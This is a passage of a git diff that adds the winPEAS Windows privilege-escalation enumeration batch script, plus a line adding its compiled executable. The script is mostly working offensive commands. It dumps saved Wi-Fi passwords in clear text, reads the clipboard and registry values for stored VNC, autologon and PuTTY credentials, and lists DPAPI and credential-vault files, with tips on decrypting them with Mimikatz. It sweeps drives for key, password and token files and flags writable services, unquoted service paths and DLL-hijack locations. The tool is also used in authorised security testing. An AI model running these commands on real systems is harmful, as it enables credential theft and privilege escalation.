1 + +:NetworkInterfaces +CALL :ColorLine " %E%33m[+]%E%97m INTERFACES" +ipconfig /all +ECHO. +CALL :T_Progress 1 + +:NetworkUsedPorts +CALL :ColorLine " %E%33m[+]%E%97m USED PORTS" +ECHO. [i] Check for services restricted from the outside +netstat -ano | findstr /i listen +ECHO. +CALL :T_Progress 1 + +:NetworkFirewall +CALL :ColorLine " %E%33m[+]%E%97m FIREWALL" +netsh firewall show state +netsh firewall show config +ECHO. +CALL :T_Progress 2 + +:ARP +CALL :ColorLine " %E%33m[+]%E%97m ARP" +arp -A +ECHO. +CALL :T_Progress 1 + +:NetworkRoutes +CALL :ColorLine " %E%33m[+]%E%97m ROUTES" +route print +ECHO. +CALL :T_Progress 1 + +:WindowsHostsFile +CALL :ColorLine " %E%33m[+]%E%97m Hosts file" +type C:\WINDOWS\System32\drivers\etc\hosts | findstr /v "^#" +CALL :T_Progress 1 + +:DNSCache +CALL :ColorLine " %E%33m[+]%E%97m DNS CACHE" +ipconfig /displaydns | findstr "Record" | findstr "Name Host" +ECHO. +CALL :T_Progress 1 + +:WifiCreds +CALL :ColorLine " %E%33m[+]%E%97m WIFI" +for /f "tokens=4 delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & ECHO.) +CALL :T_Progress 1 + +:BasicUserInfo +CALL :ColorLine "%E%32m[*]%E%97m BASIC USER INFO +ECHO. [i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups +ECHO. +CALL :ColorLine " %E%33m[+]%E%97m CURRENT USER" +net user %username% +net user %USERNAME% /domain 2>nul +whoami /all +ECHO. +CALL :T_Progress 2 + +:BasicUserInfoUsers +CALL :ColorLine " %E%33m[+]%E%97m USERS" +net user +ECHO. +CALL :T_Progress 1 + +:BasicUserInfoGroups +CALL :ColorLine " %E%33m[+]%E%97m GROUPS" +net localgroup +ECHO. +CALL :T_Progress 1 + +:BasicUserInfoAdminGroups +CALL :ColorLine " %E%33m[+]%E%97m ADMINISTRATORS GROUPS" +REM seems to be localised +net localgroup Administrators 2>nul +net localgroup Administradores 2>nul +ECHO. +CALL :T_Progress 1 + +:BasicUserInfoLoggedUser +CALL :ColorLine " %E%33m[+]%E%97m CURRENT LOGGED USERS" +quser +ECHO. +CALL :T_Progress 1 + +:KerberosTickets +CALL :ColorLine " %E%33m[+]%E%97m Kerberos Tickets" +klist +ECHO. +CALL :T_Progress 1 + +:CurrentClipboard +CALL :ColorLine " %E%33m[+]%E%97m CURRENT CLIPBOARD" +ECHO. [i] Any password inside the clipboard? +powershell -command "Get-Clipboard" 2>nul +ECHO. +CALL :T_Progress 1 + +:ServiceVulnerabilities +CALL :ColorLine "%E%32m[*]%E%97m SERVICE VULNERABILITIES" +:::sysinternals external tool +::ECHO. +::CALL :ColorLine " %E%33m[+]%E%97m SERVICE PERMISSIONS WITH accesschk.exe FOR 'Authenticated users', Everyone, BUILTIN\Users, Todos and CURRENT USER" +::ECHO. [i] If Authenticated Users have SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG or WRITE_DAC or WRITE_OWNER or GENERIC_WRITE or GENERIC_ALL, you can modify the binary that is going to be executed by the service and start/stop the service +::ECHO. [i] If accesschk.exe is not in PATH, nothing will be found here +::ECHO. [i] AUTHETICATED USERS +::accesschk.exe -uwcqv "Authenticated Users" * /accepteula 2>nul +::ECHO. [i] EVERYONE +::accesschk.exe -uwcqv "Everyone" * /accepteula 2>nul +::ECHO. [i] BUILTIN\Users +::accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul +::ECHO. [i] TODOS +::accesschk.exe -uwcqv "Todos" * /accepteula 2>nul +::ECHO. [i] %USERNAME% +::accesschk.exe -uwcqv %username% * /accepteula 2>nul +::ECHO. +::CALL :ColorLine " %E%33m[+]%E%97m SERVICE PERMISSIONS WITH accesschk.exe FOR *" +::ECHO. [i] Check for weird service permissions for unexpected groups" +::accesschk.exe -uwcqv * /accepteula 2>nul +CALL :T_Progress 1 +ECHO. + +:ServiceBinaryPermissions +CALL :ColorLine " %E%33m[+]%E%97m SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS" +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services +for /f "tokens=2 delims='='" %%a in ('cmd.exe /c wmic service list full ^| findstr /i "pathname" ^|findstr /i /v "system32"') do ( + for /f eol^=^"^ delims^=^" %%b in ("%%a") do icacls "%%b" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos usuarios %username%" && ECHO. +) +ECHO. +CALL :T_Progress 1 + +:CheckRegistryModificationAbilities +CALL :ColorLine " %E%33m[+]%E%97m CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY" +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services +for /f %%a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv >nul 2>&1 & reg save %%a %temp%\reg.hiv >nul 2>&1 && reg restore %%a %temp%\reg.hiv >nul 2>&1 && ECHO.You can modify %%a +ECHO. +CALL :T_Progress 1 + +:UnquotedServicePaths +CALL :ColorLine " %E%33m[+]%E%97m UNQUOTED SERVICE PATHS" +ECHO. [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Progam.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe' +ECHO. [i] The permissions are also checked and filtered using icacls +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services +for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do ( + for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do ( + ECHO.%%~s ^| findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (ECHO.%%n && ECHO.%%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && ECHO. + ) +) +CALL :T_Progress 2 +::wmic service get name,displayname,pathname,startmode | more | findstr /i /v "C:\\Windows\\system32\\" | findstr /i /v """ +ECHO. +::CALL :T_Progress 1 + +:PATHenvHijacking +CALL :ColorLine "%E%32m[*]%E%97m DLL HIJACKING in PATHenv variable" +ECHO. [i] Maybe you can take advantage of modifying/creating some binary in some of the following locations +ECHO. [i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking +for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. ) +ECHO. +CALL :T_Progress 1 + +:WindowsCredentials +CALL :ColorLine "%E%32m[*]%E%97m CREDENTIALS" +ECHO. +CALL :ColorLine " %E%33m[+]%E%97m WINDOWS VAULT" +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#windows-vault +cmdkey /list +ECHO. +CALL :T_Progress 2 + +:DPAPIMasterKeys +CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS" +ECHO. [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi +powershell -command "Get-ChildItem %appdata%\Microsoft\Protect" 2>nul +powershell -command "Get-ChildItem %localappdata%\Microsoft\Protect" 2>nul +CALL :T_Progress 2 +CALL :ColorLine " %E%33m[+]%E%97m DPAPI MASTER KEYS" +ECHO. [i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt +ECHO. [i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi +ECHO. +ECHO.Looking inside %appdata%\Microsoft\Credentials\ +ECHO. +dir /b/a %appdata%\Microsoft\Credentials\ 2>nul +CALL :T_Progress 2 +ECHO. +ECHO.Looking inside %localappdata%\Microsoft\Credentials\ +ECHO. +dir /b/a %localappdata%\Microsoft\Credentials\ 2>nul +CALL :T_Progress 2 +ECHO. + +:UnattendedFiles +CALL :ColorLine " %E%33m[+]%E%97m Unattended files" +IF EXIST %WINDIR%\sysprep\sysprep.xml ECHO.%WINDIR%\sysprep\sysprep.xml exists. +IF EXIST %WINDIR%\sysprep\sysprep.inf ECHO.%WINDIR%\sysprep\sysprep.inf exists. +IF EXIST %WINDIR%\sysprep.inf ECHO.%WINDIR%\sysprep.inf exists. +IF EXIST %WINDIR%\Panther\Unattended.xml ECHO.%WINDIR%\Panther\Unattended.xml exists. +IF EXIST %WINDIR%\Panther\Unattend.xml ECHO.%WINDIR%\Panther\Unattend.xml exists. +IF EXIST %WINDIR%\Panther\Unattend\Unattend.xml ECHO.%WINDIR%\Panther\Unattend\Unattend.xml exists. +IF EXIST %WINDIR%\Panther\Unattend\Unattended.xml ECHO.%WINDIR%\Panther\Unattend\Unattended.xml exists. +IF EXIST %WINDIR%\System32\Sysprep\unattend.xml ECHO.%WINDIR%\System32\Sysprep\unattend.xml exists. +IF EXIST %WINDIR%\System32\Sysprep\unattended.xml ECHO.%WINDIR%\System32\Sysprep\unattended.xml exists. +IF EXIST %WINDIR%\..\unattend.txt ECHO.%WINDIR%\..\unattend.txt exists. +IF EXIST %WINDIR%\..\unattend.inf ECHO.%WINDIR%\..\unattend.inf exists. +ECHO. +CALL :T_Progress 2 + +:SAMSYSBackups +CALL :ColorLine " %E%33m[+]%E%97m SAM and SYSTEM backups" +IF EXIST %WINDIR%\repair\SAM ECHO.%WINDIR%\repair\SAM exists. +IF EXIST %WINDIR%\System32\config\RegBack\SAM ECHO.%WINDIR%\System32\config\RegBack\SAM exists. +IF EXIST %WINDIR%\System32\config\SAM ECHO.%WINDIR%\System32\config\SAM exists. +IF EXIST %WINDIR%\repair\SYSTEM ECHO.%WINDIR%\repair\SYSTEM exists. +IF EXIST %WINDIR%\System32\config\SYSTEM ECHO.%WINDIR%\System32\config\SYSTEM exists. +IF EXIST %WINDIR%\System32\config\RegBack\SYSTEM ECHO.%WINDIR%\System32\config\RegBack\SYSTEM exists. +ECHO. +CALL :T_Progress 3 + +:McAffeeSitelist +CALL :ColorLine " %E%33m[+]%E%97m McAffee SiteList.xml" +cd %ProgramFiles% 2>nul +dir /s SiteList.xml 2>nul +cd %ProgramFiles(x86)% 2>nul +dir /s SiteList.xml 2>nul +cd "%windir%\..\Documents and Settings" 2>nul +dir /s SiteList.xml 2>nul +cd %windir%\..\Users 2>nul +dir /s SiteList.xml 2>nul +ECHO. +CALL :T_Progress 2 + +:GPPPassword +CALL :ColorLine " %E%33m[+]%E%97m GPP Password" +cd "%SystemDrive%\Microsoft\Group Policy\history" 2>nul +dir /s/b Groups.xml == Services.xml == Scheduledtasks.xml == DataSources.xml == Printers.xml == Drives.xml 2>nul +cd "%windir%\..\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history" 2>nul +dir /s/b Groups.xml == Services.xml == Scheduledtasks.xml == DataSources.xml == Printers.xml == Drives.xml 2>nul +ECHO. +CALL :T_Progress 2 + +:CloudCreds +CALL :ColorLine " %E%33m[+]%E%97m Cloud Credentials" +cd "%SystemDrive%\Users" +dir /s/b .aws == credentials == gcloud == credentials.db == legacy_credentials == access_tokens.db == .azure == accessTokens.json == azureProfile.json 2>nul +cd "%windir%\..\Documents and Settings" +dir /s/b .aws == credentials == gcloud == credentials.db == legacy_credentials == access_tokens.db == .azure == accessTokens.json == azureProfile.json 2>nul +ECHO. +CALL :T_Progress 2 + +:AppCMD +CALL :ColorLine " %E%33m[+]%E%97m AppCmd" +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe +IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists. +ECHO. +CALL :T_Progress 2 + +:RegFilesCredentials +CALL :ColorLine " %E%33m[+]%E%97m Files in registry that may contain credentials" +ECHO. [i] Searching specific files that may contains credentials. +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files +ECHO.Looking inside HKCU\Software\ORL\WinVNC3\Password +reg query HKCU\Software\ORL\WinVNC3\Password 2>nul +CALL :T_Progress 2 +ECHO.Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password +reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password 2>nul +CALL :T_Progress 2 +ECHO.Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon +reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername" +CALL :T_Progress 2 +ECHO.Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP +reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s 2>nul +CALL :T_Progress 2 +ECHO.Looking inside HKCU\Software\TightVNC\Server +reg query HKCU\Software\TightVNC\Server 2>nul +CALL :T_Progress 2 +ECHO.Looking inside HKCU\Software\SimonTatham\PuTTY\Sessions +reg query HKCU\Software\SimonTatham\PuTTY\Sessions /s 2>nul +CALL :T_Progress 2 +ECHO.Looking inside HKCU\Software\OpenSSH\Agent\Keys +CALL :T_Progress 2 +reg query HKCU\Software\OpenSSH\Agent\Keys /s 2>nul +cd %USERPROFILE% 2>nul && dir /s/b *password* == *credential* 2>nul +cd ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\.. +dir /s/b /A:-D RDCMan.settings == *.rdg == SCClient.exe == *_history == .sudo_as_admin_successful == .profile == *bashrc == httpd.conf == *.plan == .htpasswd == .git-credentials == *.rhosts == hosts.equiv == Dockerfile == docker-compose.yml == appcmd.exe == TypedURLs == TypedURLsTime == History == Bookmarks == Cookies == "Login Data" == places.sqlite == key3.db == key4.db == credentials == credentials.db == access_tokens.db == accessTokens.json == legacy_credentials == azureProfile.json == unattend.txt == access.log == error.log == *.gpg == *.pgp == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12 == *.der == *.csr == *.cer == known_hosts == id_rsa == id_dsa == *.ovpn == anaconda-ks.cfg == hostapd.conf == rsyncd.conf == cesi.conf == supervisord.conf == tomcat-users.xml == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == unattend.xml == unattended.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == groups.xml == services.xml == scheduledtasks.xml == printers.xml == drives.xml == datasources.xml == php.ini == https.conf == https-xampp.conf == httpd.conf == my.ini == my.cnf == access.log == error.log == server.xml == SiteList.xml == ConsoleHost_history.txt == setupinfo == setupinfo.bak 2>nul | findstr /v ".dll" +cd inetpub 2>nul && (dir /s/b web.config == *.log & cd ..) +ECHO. +CALL :T_Progress 2 + +:ExtendedDriveScan +if "%long%" == "true" ( + CALL :ColorLine " %E%33m[+]%E%97m REGISTRY WITH STRING pass OR pwd" + reg query HKLM /f passw /t REG_SZ /s + reg query HKCU /f passw /t REG_SZ /s + reg query HKLM /f pwd /t REG_SZ /s + reg query HKCU /f pwd /t REG_SZ /s + ECHO. + ECHO. [i] Iterating through the drives + ECHO. + for /f %%x in ('wmic logicaldisk get name^| more') do ( + set tdrive=%%x + if "!tdrive:~1,2!" == ":" ( + %%x + CALL :ColorLine " %E%33m[+]%E%97m FILES THAT CONTAINS THE WORD PASSWORD WITH EXTENSION: .xml .ini .txt *.cfg *.config" + findstr /s/n/m/i password *.xml *.ini *.txt *.cfg *.config 2>nul | findstr /v /i "\\AppData\\Local \\WinSxS ApnDatabase.xml \\UEV\\InboxTemplates \\Microsoft.Windows.Cloud \\Notepad\+\+\\ vmware cortana alphabet \\7-zip\\" 2>nul + ECHO. + CALL :ColorLine " %E%33m[+]%E%97m FILES WHOSE NAME CONTAINS THE WORD PASS CRED or .config not inside \Windows\" + dir /s/b *pass* == *cred* == *.config* == *.cfg 2>nul | findstr /v /i "\\windows\\" + ECHO. + ) + ) + CALL :T_Progress 2 +) ELSE ( + CALL :T_Progress 2 +) +TITLE WinPEAS - Windows local Privilege Escalation Awesome Script - Idle +ECHO.--- +ECHO.Scan complete. +PAUSE >NUL +EXIT /B + +:::-Subroutines + +:SetOnce +REM :: ANSI escape character is set once below - for ColorLine Subroutine +SET "E=0x1B[" +SET "PercentageTrack=0" +EXIT /B + +:T_Progress +SET "Percentage=%~1" +SET /A "PercentageTrack=PercentageTrack+Percentage" +TITLE WinPEAS - Windows local Privilege Escalation Awesome Script - Scanning... !PercentageTrack!%% +EXIT /B + +:ColorLine +SET "CurrentLine=%~1" +FOR /F "delims=" %%A IN ('FORFILES.EXE /P %~dp0 /M %~nx0 /C "CMD /C ECHO.!CurrentLine!"') DO ECHO.%%A +EXIT /B diff --git a/win/winPEAS.exe b/win/winPEAS.exe new file mode 100644 index 0000000..4b19fe0 Binary files /dev/null and b/win/winPEAS.exe differ